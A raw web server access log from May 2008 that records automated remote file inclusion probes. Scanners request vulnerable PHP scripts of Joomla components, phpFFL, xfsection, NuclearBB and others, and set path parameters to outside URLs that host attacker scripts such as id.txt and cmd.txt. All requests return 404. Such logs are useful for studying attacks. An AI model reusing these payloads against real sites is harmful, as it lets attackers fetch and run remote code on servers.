85.214.59.130 - - [28/May/2008:11:58:10 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:58:11 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:58:13 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:11:58:21 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:11:58:25 -0700] "GET /logs/access_080117.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.75.110 - - [28/May/2008:11:58:29 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
91.121.75.110 - - [28/May/2008:11:58:29 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.195.51.249 - - [28/May/2008:11:58:31 -0700] "GET /logs/ HTTP/1.0" 200 49399 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:58:34 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:58:40 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:58:43 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:58:45 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:58:49 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:58:50 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:58:51 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:59:11 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:59:11 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:59:11 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:59:11 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:59:11 -0700] "GET /logs//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:59:17 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:59:17 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:59:17 -0700] "GET /logs//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:28 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:28 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:28 -0700] "GET /logs//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:30 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:30 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:31 -0700] "GET /logs//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:40 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:40 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:59:40 -0700] "GET /logs//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:59:49 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:59:49 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:59:49 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:59:50 -0700] "GET /logs/access_080310.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:59:51 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:59:51 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:59:51 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:12:00:02 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:12:00:03 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:12:00:03 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.52.131.225 - - [28/May/2008:12:00:11 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://abadiasanpatricio.com/css/font.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
212.227.251.172 - - [28/May/2008:12:00:27 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:12:00:38 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:12:00:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:01:22 -0700] "GET /logs/access_080421.log/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:01:28 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:01:28 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:01:28 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:12:01:32 -0700] "GET /logs/access.log/show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:12:01:32 -0700] "GET /logs/access.log/show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:12:01:41 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:12:01:41 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:12:01:41 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:01:44 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:12:01:49 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:12:01:49 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:12:01:49 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:01:53 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:01:53 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:01:53 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:01:53 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:02:01 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:02:01 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:02:01 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:02:02 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:02:02 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:02:02 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:02:03 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/bobbyku/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:02:06 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:02:11 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/bobbyku/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
74.50.15.70 - - [28/May/2008:12:02:19 -0700] "GET /logs/access_080117.log/modules/xfsection/modify.php?dir_module=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.50.15.70 - - [28/May/2008:12:02:19 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.50.15.70 - - [28/May/2008:12:02:19 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:12:02:24 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:12:02:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:12:02:29 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:12:02:45 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:02:46 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:02:47 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:02:53 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:02:54 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:03:06 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:03:06 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.193.201.57 - - [28/May/2008:12:03:09 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [28/May/2008:12:03:09 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [28/May/2008:12:03:09 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:03:10 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:03:10 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:12:03:11 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:12:03:11 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:12:03:12 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.15.70 - - [28/May/2008:12:03:12 -0700] "GET /logs/access_080118.log/modules/xfsection/modify.php?dir_module=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:03:12 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:03:12 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.184.18 - - [28/May/2008:12:03:21 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.184.18 - - [28/May/2008:12:03:21 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.184.18 - - [28/May/2008:12:03:21 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:12:03:36 -0700] "GET //phpSecurePages/secure.php=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:12:03:36 -0700] "GET /logs//phpSecurePages/secure.php=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:03:57 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/bobbyku/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
59.126.46.141 - - [28/May/2008:12:03:58 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/bobbyku/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:12:04:02 -0700] "GET /logs/access_080308.log//gallery//update/update5.php?lang=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:12:04:02 -0700] "GET //gallery//update/update5.php?lang=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:12:04:03 -0700] "GET /logs//gallery//update/update5.php?lang=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:12:04:05 -0700] "GET /logs/access_080215.log/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:12:04:05 -0700] "GET /plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:12:04:05 -0700] "GET /logs/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
